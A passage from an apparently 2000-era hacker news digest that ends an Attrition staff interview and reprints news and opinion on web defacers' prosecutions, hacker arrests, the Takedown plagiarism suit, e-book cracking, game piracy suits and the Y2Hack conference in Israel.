I think the FBI need to stand back and qualify what is worth investigating. WHiTe_VaMPiRe: I think the next law that gets passed should be one that sets a mandatory limit on what qualifies someone to be an admin. a large media response is not a good justification for an investigation They are being jerked in every direction by bureaucracy, charlatan consultants claiming to have miracle solutions, media pressure, and more how can they be expected to do a good job when they have no understanding of the security arena? The proposal I'm working on should eradicate a lot of charlatans and snakeoil in the industry. I love the admins that throw up an NT server and leave it... kinda like leaving your car running while going to the store Why concentrate on a Web defacement where nothing was deleted, yet ignore the constant intrusions into gov servers by machines in foreign countries Think the FBI would have busted Curador had there been no media attention? hell no. cult_hero: curador also wiggled his ass at them, which was not a bright thing to do. curador bragged too much. without the media attention, they never would have seen such ass wiggling heh true Although, I have to admit....there was less attention on Curador than there was with Max Stone and the DDoSers What got Curador was that he used the stuff he stole. Which was not too terribly bright. oh.. new buzzword bingo will be "Zombie Attacks" look for it at a theatre near you! fraud bumped it into a new level of crime that and he kept moving from place to place leaving a new trail to add to the investigation each time. I think the other half of that criminal investigation should be the sites that left CC data on the server unencrypted. all free servers, which log heavily I'd like to stay with that for a moment. You see, a lot of our rights are under attack by our own government.
Our right to explore (ala restrictions on reverse engineering) Our right to possess firearms Our right against unreasonable search and seizure (see the drug laws) Did you know that if you carry around more than 500 dollars on your person and a cop sees it, that money can be legally taken from you WITHOUT your being arrested or charged?? And you have to PROVE you have it legally. I kid you not. It's part of the zero tolerance anti-drug laws. look it up. I -- right now -- am a Fourth Amendment nightmare waiting to happen. I plan to rant on it via attrition in the future. Guns are my primary passion. To me, the 2nd Amendment is as crucial as the First Amendment (which is what Attrition is all about). As the defaced Web site archive seems to be the area most focused on within ATTRITION these days, what section do you feel is most overlooked, or does not get as much attention as it deserves? calamari errata and our various tech areas vulnerabilities staff.html ;) Newbie haha Firearms. more seriously, 1. the stats I cannot end this interview without asking this thought provoking and vital question running through everyone's mind.. do you guys like Ramen (noodles)? Always room for Ramen i dig ramen. with butter not as much as calamari, sushi or mississippi mud tho Ramen: Yes. I don't eat Ramen...but Satrina does. I eat Popcorn. sushi Filet Mignon. yes, sushi is the best hmmm sushi enough of that hehehe Whiskey Sours, Mudslides, General Gau Chicken, and Nigiri there is this place Sushi King Okay, okay, what 'geek' does not like Ramen. Answer this, what kind of Ramen do you prefer? COFFEE. its a great place for the gender benders like jericho I dig the Cup o Soup honestly. i like the chili ramen :) I eat Habanero chilis and popcorn. I was born before Ramen came into existence. Anything you would like to discuss or any closing comments before we end this interview? One thing I'd like to add. if something isn't covered here... just mail and ask Okay, will do.
Thanks a lot for the time. We are a proactive group. We are also very *pro* on things like accuracy, truth and fairness. not just you vamp, all the interview readers too. This does not mean we are against anyone. We are only against those people who do not practice accuracy, truth or fairness. It's a matter of principles, not personalities. And don't let anyone tell you different.

ATTRITION is reachable at http://www.attrition.org/. You can find more information about the staff on this Web page or mail them.

@HWA

141.0 HNN:Mar 29th:The Unfairness of Computer Crime Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Agrajag

Are the punishments given to those who commit relatively minor computer-related crimes, such as web page defacements, unfair? Rather than being treated like their real-world counterparts (eg: trespass and spray-painting graffiti), and earning the fairly minor sentences that fit the actual crimes, they are most often treated as serious felonies deserving of overly harsh punishments, which are completely out of line with the crimes committed and are seemingly given only because a computer was involved.

Linux World
http://www.linuxworld.com/linuxworld/lw-2000-03/lw-03-devnul_3.html

----------

A matter of degrees: Let the punishment fit the crime.

Summary
When Attorney General Janet Reno's report, "The Electronic Frontier: The Challenge of Unlawful Conduct on the Internet," was published earlier this month, it drew the conclusion that "existing federal law is generally adequate to cover unlawful conduct involving the use of the Internet." J.S. Kelly rather vehemently disagrees with that finding. (2,000 words)

By J.S. Kelly

The US attorney general's report, entitled "The Electronic Frontier: The Challenge of Unlawful Conduct on the Internet," repeatedly emphasized a need to treat unlawful conduct online the same as it is treated offline.
At least two glaring examples of how cyber issues are handled differently than their counterpart issues in the non-Internet world were not included in the report. One of those issues is that car manufacturers, unlike software companies, are held liable for selling products they know are defective. I'd like to address that well-known shortcoming in a future column, devoting this one to an issue that's even more important.

Free Coolio

In the first week of March, at about the same time the report was published, news sources reported that a 17-year-old New Hampshire kid, who goes by the online name Coolio, had been detained as a suspect in a hacking case. The teen told reporters that he had defaced three Web sites, of which two were US government sites. But they weren't exactly the equivalent of the Pentagon -- D.A.R.E. is the Los Angeles Police Department's antidrug Website for kids, and the CWC is the relatively unknown and unimportant Chemical Weapons Convention Webpage. The site hosts informational texts relating to the CWC, a global treaty that bans chemical weapons. The third supposed hack (a hijacking, actually) attributed to Coolio is that of RSA, a commercial computer security company.

Website defacement is being described by US authorities as felony vandalism, while in Canada the same phenomenon seems to be called malicious mischief to data.

Let he who is without youthful indiscretions cast the first stone

The media, with visions of Pulitzer prizes dancing in their heads, have pursued this story with due diligence and vigor. News reports described the teen in ominous tones, as "a high school dropout" who "regularly gets high on cough syrup," who is supposedly emotionally unstable because he is liable to fly off the handle when criticized, and whose room is "almost too messy to enter." Give me a break -- the kid is 17 years old.
If they'd found a 17-year-old with a really neat room, who was ostensibly not prey to the emotional ups and downs usually associated with adolescence, then I might be a little more worried. I'd prefer that he experimented with cough syrup and mouthwash than with heroin. And he was not a dropout: he left school early and got his GED.

Now, you might argue that to break into computers and to deface US government Websites is, well, kind of dumb. I don't disagree. But adolescence is dumb, too. Adolescence is all about testing limits, standing up to authority (and rejecting it) and generally behaving like an idiot. It's also about thinking you'll never die, and that you'll never get caught.

According to news reports, Coolio will be charged as an adult with "unlawfully accessing a computer or otherwise disrupting computer operations that results in more than $1,000 in harm." (D.A.R.E., a not-for-profit organization, claims it lost $18,000 -- from the potential donations that might have flooded in to the site had it not been in its altered state.) If convicted (as an adult), the kid could face 5 to 15 years in prison and a maximum fine of $4,000 -- for one Website defacement. He has, however, admitted to three, and that would earn him a potential total of 45 years in jail. But he got D.A.R.E. twice -- so that could bring the number of years to 60. You know, I just don't think adolescent pranks usually carry these kinds of consequences in the real world.

Tough on crime

Reno's Department of Justice report mentions the need to teach kids in schools about ethical computer use. The department plans to use a cartoon character similar to McGruff the Crime Dog to ensure the friendliness of the message. Something tells me they're targeting the wrong demographic here.

The report also suggests that courts not be required to sentence all computer intruders to what is now a mandatory six-month jail term for unauthorized access to systems.
(Note that the use of the word systems is pretty vague here, as, for that matter, is the use of the term unauthorized access.) The motivation for the sentence reduction is not mercy. It is the opposite. The attorney general's report explains: "In some instances, prosecutors have exercised their discretion and elected not to charge some defendants whose actions otherwise would qualify them for prosecution under that section, knowing that the result would be mandatory imprisonment." The Justice Department wants more convictions, and it is willing to waive mandatory sentencing to get them. Imagine how conviction rate statistics for computer crime might jump from 1999 to 2000 if the department's request is granted. Reno's report continues: "Computer hacking 'for fun' is a very serious problem not only for the targets of the attacks but also for law enforcement personnel who often have no way to determine the motivation for and the identity of the person behind the intrusion." That bothers me. Our laws permit us to determine motivation for crimes such as murder in the first degree versus manslaughter -- or the difference between loitering and loitering with intent. I guess it's the purview of the court -- and not law enforcement -- to determine the motivation, just as it's allegedly in the purview of the court -- and not the legislature -- to determine sentencing. But if motivation is considered to be important in murder and in loitering, why isn't it considered to be important in computer intrusions? Too much free speech In Coolio's case at least, the messages that he allegedly left on each of the Webpages might serve as our first clue to his motivation. You can see all of them at the attrition.org mirror site (see Resources for URL). The RSA defacement was a parody of the firm's regular front page -- it was even pretty funny. At D.A.R.E., he twice replaced their regular home page with (pretty lame) "pro-drug" messages. 
But the last line in the text to his CWC defacement made me laugh out loud. The entire text reads: PEACE THROUGH POWER ONE VISION ONE PURPOSE muhaha I did steal head server of Internet. If push "power" button the hole net will be shutdown. I hate all you Quake Playas!! !!uu!! And if push reset button the whole Internet going to DIE Praise Allah and also Coolio for making this all possible! If prayers do not become mandatory throughout the United States, we will detonate our nuclear bombs and your President Clinton and his interns will die. One more thing, there is too much free speech on the internet, we want you to try to do something about it. Thanks. This CWC message was described by the Secret Service and reported by MSNBC as a death threat to the president. I respect the fact that law enforcement needs to treat death threats seriously. I also respect the fact that security personnel -- in law enforcement as in computer security -- are paid to be paranoid. But I do think that calling Coolio's text "a death threat to the President" is stretching it a bit. Dare I suggest that the D.A.R.E. site's damage estimates are also exaggerated? I wonder how they would estimate damages and determine the motivation for an incident in which somebody's domicile was toilet-papered? After all, the act involves trespassing, doesn't it? It sounds like a pretty serious breach of security to me, and it could happen to anyone. After all, the streets are totally unregulated. Perhaps scariest of all is the fact that if it happened to me, I would never, ever be able to trace the perpetrator who originated the attack back to his house. Somebody declare a state of emergency, quick! Is your refrigerator running? If instead of defacing its Website, Coolio had made prank phone calls to D.A.R.E., would those calls count as unauthorized access to systems? Would the Feds be calling for the power to install phone taps on all of the nation's phones to catch him? 
Would they spend thousands of dollars in taxpayer money to crisscross the entire country in search of him and then threaten him with 5 to 15 years in jail? Would he have been portrayed as a guilty-until-proven-innocent hoodlum in the media? Not all "computer crimes" are equivalent to one another. Merely poking around a system is different from defacing a Website -- which is different from stealing passwords, which is different from stealing credit card numbers, which is different from actually using those credit card numbers. If you don't know what I mean by that, then G. William Troxler's essay about different types of hacking (see Resources) might be a good starting point towards understanding some different motivations for "unauthorized access to systems." I guess law enforcement is asking for such tough sanctions against kids (felony vandalism, indeed) in the attempt to "scare them straight" and teach them to "respect the law." It's OK to try to do that. But it is not OK to do that with inhumane and inappropriate punishments that do not fit the crime. That area of law is dangerously broken. If you don't believe me, go read Robert W.F. Clark's account of being arrested for computer crime ("My Bust or An Odyssey of Ignorance"), the story of Bernie S, and Brian Martin's essays (see Resources). I'm sure that Coolio didn't think that he would be caught. I'm equally sure that prosecutors won't be interested in his motivation or in investigating what he really did. How soon will it be before young Americans -- of both sexes, this time -- begin to run away from the United States to seek sanctuary in Canada again? I guess we should be glad that at least one North American country appears to be relatively sane. But I wish that the one I live in right now was, too. The real world I am not trying to say that everyone who has breached security is a kid. Nor am I saying that everyone who has breached security is harmless. 
A great deal of harm can be done -- and probably is being done, even as you read this -- by people of real malice, perhaps people such as the PhoneMasters (see Resources). Criminals should be caught, and they should be punished. But those who violate privacy, embezzle money, and steal credit card numbers don't go around drawing attention to themselves by defacing Webpages. Besides, we already have other laws which can be used to punish people who embezzle money or commit credit card fraud. But I think that Coolio should be punished, too. Being grounded (without the use of his computer) for two weeks might be adequate. Taking the cough syrup into account, let's make it a month. With Janet Reno's report, law enforcement is asking for more money to fight the looming specter of cybercrime. I'd love to know exactly how much money has been spent to track down this kid from New Hampshire. If law enforcement continues to dispense money willy-nilly to track adolescent pranksters, they will never have enough time, money, or personnel -- no matter how many times we increase their budget -- to recognize and go after the real criminals -- like the ones that the government predicts will only make their presence known once they are prepared to strike. Yeah, like, I remember the last time that happened, when Dr No hijacked those nuclear warheads off the coast of Cape Canaveral. It was really terrifying to have the whole world held hostage by a supercriminal like that. Perhaps Ms Reno et all need to spend a bit more time on the Internet, and a bit less time watching reruns on TV. @HWA 142.0 HNN:Mar 29th:@tlanta Con to be Held this Weekend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by fuller212 @tlanta con is a hacking/phreaking convention hosted by the South Eastern 2600 groups in Atlanta Georgia. It was created due to demand of another hacking convention in the South Eastern US. 
@tlanta Con will be held this Friday, Saturday and Sunday at the Ramada Inn and Conference Center in Midtown Atlanta.

Atlanta Con
http://www.atlantacon.org/

----------

@HWA

143.0 HNN:Mar 30th:MostHateD Busted for Burglary and Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Knack

MostHateD (Patrick W. Gregory) was arrested on Tuesday and is being held in Harris County Jail in Texas on charges of burglary and car theft. This arrest prevented him from appearing in federal court on Wednesday to plead guilty to defacing the White House web page. It is unclear what the status of his federal charges is at this time.

Houston Chronicle
http://www.chron.com/cs/CDA/story.hts/metropolitan/507263

----------

March 29, 2000, 10:07PM

Computer hacker, 19, held on charges of burglary and car theft

A computer hacker charged with breaking into White House, Army and Senate computers is being held in Harris County Jail on unrelated charges of burglary and car theft.

Patrick W. Gregory, 19, who lives in east Harris County, had been scheduled to appear in federal court Wednesday to plead guilty to damaging computers and trafficking in unauthorized personal identification numbers. His Tuesday arrest prevented that.

"What we have him for is fairly unspectacular," said sheriff's Capt. Don McWilliams. "These are not related to his prior federal cases. What we have him for is not related to that at all."

He was arrested after the sheriff's Burglary Response Squad found enough evidence to charge him with burglary and unauthorized use of a vehicle. No details on that case were available.

Only after arresting him did sheriff's investigators discover that Gregory was due to appear in federal court on the hacking charge.

"What happens now with his federal situation, I couldn't say," McWilliams said.

During his days as a high-profile, high-tech bandit, Gregory called himself "MostHateD" and headed a computer gang dubbed "globalHell," according to a plea agreement he signed earlier this month.

The hacker group drew attention last May when it succeeded in getting into the White House Web site. That gang also is accused of vandalizing Army and Senate computers. Prosecutors accuse the group of illegally accessing teleconference services from AT&T, MCI and Sprint.

Gregory was one of four Houston-area teens arrested.

Gregory told the Houston Chronicle last June that globalHell numbered as many as 20 people, including a handful of international members, primarily in Europe. Most were youngsters trying to make a name for themselves through Web-hacking, he said.

Gregory's hard drive, seized by government agents who raided his house, revealed he was adept at ducking in and out of varied databases, including the state of West Virginia's main Web page, the Philippines Bureau of Internal Revenue, the British Computer Society, the American Retirement Corp. and the government of Burundi.

@HWA

144.0 HNN:Mar 30th:Miramax Sued for Fugitive Game
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

The Miramax division of The Walt Disney Company has been sued for allegedly stealing the story line of 'The Fugitive Game' without the author's permission. 'The Fugitive Game' by Jonathan Littman details the arrest and capture of Kevin Mitnick. The Disney/Miramax/Dimension Films production of the movie Takedown premiered earlier this month in 29 theaters in Paris, France. The suit alleges that the movie is based in large part on Littman's book.
Business Wire - via Northern Light
http://library.northernlight.com/FB20000329240000273.html?cb

----------

Disney and Miramax Sued for 'Hacking'; Parts of 'The Fugitive Game' Allegedly Stolen For New Movie

Story Filed: Wednesday, March 29, 2000 8:18 AM EST

SAN FRANCISCO, Mar 29, 2000 (BUSINESS WIRE) -- The Walt Disney Company and its Miramax division have made a computer hacker movie that "hacked" the author's book without paying or giving credit to the writer, according to a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law firm representing best-selling author Jonathan Littman.

Littman's suit alleges that the Disney/Miramax/Dimension Films production of the movie Takedown, which premiered earlier this month in 29 theatres in Paris, France, was based in large part on lifted segments of Littman's book, The Fugitive Game. Littman's book, published in 1996, is based on the celebrated capture of computer hacker Kevin Mitnick, who was billed at the time as the world's most notorious and dangerous "cyberterrorist."

"Jonathan Littman carefully researched the reality of the computer hacker underworld," said his lawyer Bill Edlund. "His book articulated and supported his view that Kevin Mitnick was not the premeditated, greedy and destructive criminal portrayed by some of the media. Readers and critics received Littman's The Fugitive Game as a more in-depth presentation and entertaining expose of the flawed Mitnick prosecution than the overblown, self-interested media hype."

The Fugitive Game shows Mitnick to be not a terrorist, but a computer hacker, in part a misguided victim of a government entrapment effort that used a sleazy informant to lure Mitnick into hacking. A key element of Littman's book is his examination of the media hype spurred in New York Times articles by reporter John Markoff about the Mitnick story. Littman also questions Markoff's presentation of Tsutomu Shimomura, a computer security specialist who used hacking techniques similar to Mitnick's to trace Mitnick to his hideout in North Carolina.

Shimomura and Markoff wrote their version of these events in their book Takedown, released at the same time as Littman's book. The book is based on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's arrest in February of 1995. The Disney organization purchased the book and movie rights to Takedown and have now released their movie version, hiring a cast that included lead actor Skeet Ulrich and screenwriters led by John Danza.

"The screenwriter could not shape the story told in the book Takedown into a workable script," said Edlund. "Once the movie project began to flounder, Danza and other screenwriters lifted most of the first part of Littman's The Fugitive Game for the storyline and start of the movie Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza. In the e-mails, the screenwriter admits that it was 'unfortunate' that Disney did not option the rights to the book The Fugitive Game to make the movie Takedown. Danza goes on to describe his desire to use Littman's insider information and parts of Littman's book in order to try and salvage the movie project."

The complaint presents a detailed comparison between Littman's book and the final shooting script for the movie Takedown, allegedly illustrating repeated and compelling similarities between the two. According to the allegations, the film Takedown and The Fugitive Game both open with a scene in a strip club frequented by a government informer who reveals to Mitnick information about "SAS" -- a secret Pacific Bell phone-tapping system that Mitnick subsequently breaks into and uses.

Littman's lawsuit also contends that various themes and interpretations from his book that are absent from the book Takedown appear in the movie version of Takedown, including the government informer and entrapment of Mitnick, and the pressure on the government to capture Mitnick created by exaggerated media hype.

Littman seeks to prevent Disney, Miramax and the other defendants from continuing to violate his copyrights by distributing the movie and to recover his damages and the wrongful profits that defendants obtained from the alleged theft of his work. Littman's lawyers say that the Disney-Miramax plagiarism tainted Littman's work by patching it into their motion picture. Because of this, he is also asking for damages that he claims resulted from opportunities he lost, including the opportunity for involvement with other movie projects based on The Fugitive Game.

Distributed via COMTEX. Copyright (C) 2000 Business Wire. All rights reserved.

CONTACT: Bartko, Zankel, Tarrant & Miller
William I. Edlund, 415/291-4579

(cool thanks man)

@HWA

145.0 HNN:Mar 30th:Glassbook Shattered
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Not a lamer

Within a day after its release, copies of the new Stephen King book "Riding the Bullet" were circulating around the Internet. The first versions were simply screen shots of the protected PDF file, but soon unlocked copies of the PDF were available. The unprotected PDF file was posted to a web site in Sweden and shortly thereafter a detailed explanation of the attack was posted to Usenet.
eBookNet
ZD Net
Dejanews
http://www.ebooknet.com/story.jsp?id
http://www.zdnet.com/zdnn/stories/news/0,4586,2487101,00.html
http://x37.deja.com/getdoc.xp?AN

----------

@HWA

146.0 HNN:Mar 30th:Yahoo Sued Over Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Yesterday videogame makers Sega, Nintendo and Electronic Arts filed a lawsuit in U.S. District Court in San Francisco, against Yahoo. The suit accuses Yahoo of copyright and trademark infringement, unfair competition, and offering illegal devices for sale and seeks compensatory damages of up to $100,000 per copyright violation, and up to $2,500 for sale of each 'mod chip'.

Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/20000329/bs/20000329024.html

----------

Wednesday March 29 03:16 PM EST

Videogame Makers Sue Yahoo Over Piracy

Elinor Abreu (Industry Standard)

Videogame makers Sega, Nintendo and Electronic Arts have filed a lawsuit against Yahoo, accusing the portal of ignoring sales of counterfeit videogames on its auction and mall areas.

The lawsuit, which the manufacturers filed yesterday in U.S. District Court in San Francisco, accuses Yahoo of copyright and trademark infringement, unfair competition, and offering illegal devices for sale.

The lawsuit asks the court to order Yahoo to stop the sales. It also seeks compensatory damages of up to $100,000 per copyright violation, and up to $2,500 for each sale of the hardware devices - some of which are called "Mod Chips" - that allow people to circumvent copyright protection, says Jeff Brown, a spokesman for Redwood City, Calif.-based Electronic Arts.

Yahoo spokeswoman Diane Hunt offers little comment on the lawsuit. "We're not aware of specific situations," she says.

The gamemakers claim people are selling the illegal items in Yahoo's auction area, and in the shopping area that Yahoo leases to outside merchants. "They are openly sold and labeled" with phrases like 'back up copy,' 'compilation disk' and 'never published,' according to Brown. "It's very widespread and blatant."

Electronic Arts sent two letters about the matter to Yahoo's general counsel last summer. It followed the letters with phone calls, Brown says - all of which were ignored. At an industry meeting with Yahoo representatives in December 1999, the company seemed unconcerned, he adds.

"Yahoo's position was that they either didn't care or didn't feel the need to address the problem," Brown says. "That is essentially what's forced us to find a legal solution."

Electronic Arts says the problem crops up on other Web sites, but that the owners of those sites are either in discussions with Electronic Arts or have taken steps to resolve the problem.

The company doesn't know the extent of its losses to online piracy, but it notes that a study by the Interactive Digital Software Association pegged worldwide losses from Net piracy and counterfeiting at $3.2 billion.

The issue of piracy looms large for makers of computer software. That's particularly true overseas, where enforcement can be lax and prices high. Within the U.S., makers of music CDs are battling with companies that offer ways to distribute digital music online.

Representatives from Nintendo and Sega, the top two gamemakers in the U.S. after Electronic Arts, were not immediately available for comment.
MP3 Sends Music Industry Back to School
http://www.thestandard.com/article/display/0,1151,12393,00.html

Copyright Case Streaming to Court
http://www.thestandard.com/article/display/0,1151,8505,00.html

Judge Halts DVD Encryption Hackers
http://www.thestandard.com/article/display/0,1151,9063,00.html

@HWA

147.0 HNN:Mar 30th:Italian University Attacked by Brazilian Intruders
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Computers at Como's Insubria University in northern Italy have been compromised by intruders based in Brazil, according to police. The Department of Physical Sciences and Mathematics suffered intrusions on 130 different systems, according to authorities. Technicians are working on tightening security on the network.

EFE - via Northern Light
http://library.northernlight.com/FA20000330540000296.html?cb

----------

BRAZILIAN HACKERS BREAK INTO COMO UNIVERSITY COMPUTER NETWORK

Story Filed: Thursday, March 30, 2000 2:41 AM EST

Rome, Mar 01, 2000 (EFE via COMTEX) -- Brazilian hackers broke into the computer system at Como's Insubria University in northern Italy, police said Wednesday, after university officials reported the incident.

The break-in affected 130 computers used by professors, researchers, students and administrative personnel in the Department of Physical Sciences and Mathematics.

Technicians have isolated the site from the rest of the university's data transmission network while they continue to work on eliminating the Brazilian virus.

Italian technicians said the hackers were able to break the security code and gain access to the network, and used several computers to take control of the e-mail system.

Even though an early check of the network revealed that damages to the system are not substantial, departmental activity has been at a total standstill for more than three days.

EFE mr/dd/vc

Copyright (c) 2000. Agencia EFE S.A.

(holy crap now thats one ACE killer article! and they get paid? wow - Ed)

@HWA

148.0 HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

An e-commerce site in China has accused another site of intruding into its systems several times over the last few months. Leaders at www 8848.net have denied the charges. The case has been referred to Beijing's Dongcheng District Public Security Sub-bureau for possible prosecution.

Xinhua - via Northern Light
http://library.northernlight.com/FC20000327510000102.html?cb

----------

E-Commerce Companies Quarreling on Hacker Issues

Story Filed: Monday, March 27, 2000 8:26 PM EST

BEIJING (March 28) XINHUA - Several Beijing-based Electronic commerce companies are quarreling with each other on hacker issues recently.

Sources with www.dangdang.com claim that its online bookstore has been hacked repeatedly this month. The sources said it believed that the hacker's Internet Protocol (IP) address was from another online shopping website, www 8848.net. An online discount store, www.123.com, also said that a hacker from 8848 had invaded its website, said today's China Daily.

Dangdang, who said the hacking had caused "serious economic losses," has reported the case to Beijing's Dongcheng District Public Security Sub-bureau and has employed an attorney for possible investigation.

However, the 8848 company denied the accusation and its CEO, Wang Juntao, confirmed that no person from his company had been involved in the behavior. Wang said that technically an IP address is very easy to imitate. He also indicated that some online shopping companies may hype the hacker issue.

The 8848 net is the biggest domestic online shopping site and Dangdang claims it is the leading domestic online bookstore.
Wang said that dot com companies should adopt more responsible attitudes on hacker issues, and should pay more attention to strengthening their network security than accusing competitors.

The Dongcheng District police authority is cautious about the case. But an official said that there are still no reports on their investigation.

A poll from a local company showed that more than half of its interviewees who have not shopped on-line said they will not try this kind of shopping in the next three months.

Copyright © 2000, Xinhua News Agency, all rights reserved.

(Suck don't they? geez - Ed)

@HWA

149.0 HNN:Mar 30th:Australia To Protect Privacy of Workers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Australia's Privacy Commissioner has published Guidelines on Workplace E-mail, Web Browsing and Privacy, in an effort to protect the privacy of workers as they use corporate computer systems. The guidelines are expected to be introduced in parliament within the next two weeks.

AsiaPulse - via Northern Light
http://library.northernlight.com/FA20000330910000165.html?cb

----------

Who cares.

@HWA

150.0 HNN:Mar 31st:Y2Hack Goes on in Israel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by tutlex

Over 350 people attended the hacker convention held in Israel last Wednesday and Thursday. Local officials tried to shut the conference down but eventually relented and allowed the convention. Participants played 'Spot the Fed' (I thought that was a Defcon thing?) and participated in a conference call with Kevin Mitnick.
Associated Press - via Yahoo
USA Today
Y2Hack
http://dailynews.yahoo.com/h/ap/20000330/tc/israel_hacker_conference_1.html
http://www.usatoday.com/life/cyber/tech/cth643.htm
http://www.y2hack.com

----------

Yahoo; Thursday March 30 1:58 PM ET

Hackers Hold Convention in Israel

By LAURIE COPANS, Associated Press Writer

JERUSALEM (AP) - Hackers from around the world overcame interrogations, censorship and an all-around bad image to hold Israel's first hacker convention, wrapping up the two-day conference Thursday without a glitch.

The 350-strong gathering was the first of its kind since the Yahoo! and e-Bay commercial sites were crippled in February, reminding companies across the globe of the dangers hackers can pose.

At the request of lawmakers, Israeli police had considered banning the conference, but Attorney General Eliyakim Rubinstein gave the go-ahead.

One of the original hackers, John Draper of Fremont, Calif., said the hackers wanted to put a better face on the practice.

``A hacker is a person who is developing programs to make them better,'' Draper told The Associated Press. ``They aren't the kind of people who break into computer systems. That's a cracker.''

Draper, known by the handle ``Captain Crunch,'' helped launch the hacker phenomenon. In 1971, he discovered that a toy whistle from a cereal box reproduced the tone needed to open a free telephone line.

Aware of his fame, Israeli security agents at the Los Angeles airport interrogated Draper for an hour, he said, and thoroughly searched his computer equipment before allowing him on the plane.

``There were many attempts to silence us on this,'' organizers said in a summary of the gathering, released on their Web site.

Police prevented the organizers from publishing one of the results of the conference: a list of vulnerable Israeli commercial Web sites.

To compile the list, participants played ``HackTheseSites'' with sites offered up by Israeli companies. The site owners were confident no one could thwart them, but they were wrong.

When they weren't eating pizza or guzzling soda, the hackers sat bent over their computer screens. They discovered that 28 percent of the Israeli net is vulnerable - about the same proportion as the rest of the world, according to organizers.

Police were invited to attend the conference and even to speak, but they turned down the offer, creating the game ``Spot the Fed.'' Participants were given the challenge of finding plainclothes policemen among them.

If a person pointed out as suspicious was in fact a security official, the official was to get an ``I am the FED'' T-shirt, and the spotter an ``I spotted the FED'' shirt. But none were found out.

Israeli lawmaker and former Science Minister Michael Eitan accepted an invitation to attend. He said that hacker games like those displayed at the conference were meant more to entertain ambitious youngsters than cause harm.

``I told them that as long as they all enjoy the freedom of the Internet and don't abuse this freedom, and make the public support police intervention, this will work,'' Eitan said in a telephone interview.

Participants also got to speak to their guru - convicted cyberbandit Kevin Mitnick - in a conference call. The 36-year-old American bemoaned the strict probation terms that ban him from using a computer or any hi-tech device.

Mitnick was released last year after serving five years in jail for breaking into the computer systems of some of America's biggest companies, including Motorola Inc. (NYSE:MOT), Novell Inc. (NasdaqNM:NOVL) and Sun Microsystems Inc. (NasdaqNM:SUNW).

``He had a lot of sympathy in the room - we all know not being able to touch a computer is a worse punishment than even being in jail,'' said Neora Shaul, a Tel Aviv computer programmer who helped coordinate the conference.

- On the Net: Conference organizers at http://www.neora.com

USA Today;

Even hackers have an expo (Writer lives under a rock apparently - Ed)

Hackers gather in Israel, despite govt. resistance

JERUSALEM (AP) - Hackers from around the world overcame interrogations, censorship and an all-around bad image to hold Israel's first hacker convention. The two-day conference wrapped up Thursday without a glitch.

The 350-strong gathering was the first of its kind since the Yahoo! and eBay commercial sites were crippled in February, reminding companies across the globe of the dangers hackers can pose.

At the request of lawmakers, Israeli police had considered banning the conference, but Attorney General Eliyakim Rubinstein gave the go-ahead.

One of the original hackers, John Draper of Fremont, Calif., said hackers wanted to put a better face on the practice.

''A hacker is a person who is developing programs to make them better,'' Draper told The Associated Press. ''They aren't the kind of people who break into computer systems. That's a cracker.''

Draper, known by the handle ''Captain Crunch,'' helped launch the hacker phenomenon. In 1971, he discovered that a toy whistle from a cereal box reproduced the tone needed to open a free telephone line.

Aware of his fame, Israeli security agents at the Los Angeles airport interrogated Draper for an hour, he said, and thoroughly searched his computer equipment before allowing him on the plane.

''There were many attempts to silence us on this,'' organizers said in a summary of the gathering, released on their Web site (www.neora.com/).

Police prevented the organizers from publishing one of the results of the conference: a list of vulnerable Israeli commercial Web sites.

To compile the list, participants played ''Hack These Sites'' with sites offered up by Israeli companies. The site owners were confident no one could penetrate them. Many were wrong.

When they weren't eating pizza or guzzling soda, the hackers sat bent over their computer screens. They discovered that 28% of the Israeli net is vulnerable - about the same proportion as the rest of the world, according to organizers.

Police were invited to attend the conference and even to speak, but they turned down the offer. Hackers engage in a game of ''Spot the Fed,'' challenging themselves to identify plainclothes policemen attending the conference.

If a person pointed out as suspicious was in fact a security official, the official was to get an ''I am the FED'' T-shirt, and the spotter an ''I spotted the FED'' shirt. No security officials were identified.

Israeli lawmaker and former Science Minister Michael Eitan accepted an invitation to attend. He said that hacker games like those displayed at the conference were meant more to entertain ambitious youngsters than cause harm.

''I told them that as long as they all enjoy the freedom of the Internet and don't abuse this freedom, and make the public support police intervention, this will work,'' Eitan said in a telephone interview.

Participants also got to speak to their guru - convicted cyberbandit Kevin Mitnick - on a conference call. The 36-year-old American bemoaned the strict probation terms that ban him from using a computer or any hi-tech device.

Mitnick was released last year after serving five years in jail for breaking into the computer systems of some of America's biggest companies, including Motorola Inc., Novell Inc. and Sun Microsystems Inc.

''He had a lot of sympathy in the room - we all know not being able to touch a computer is a worse punishment than even being in jail,'' said Neora Shaul, a Tel Aviv computer programmer who helped coordinate the conference.
@HWA

151.0 HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

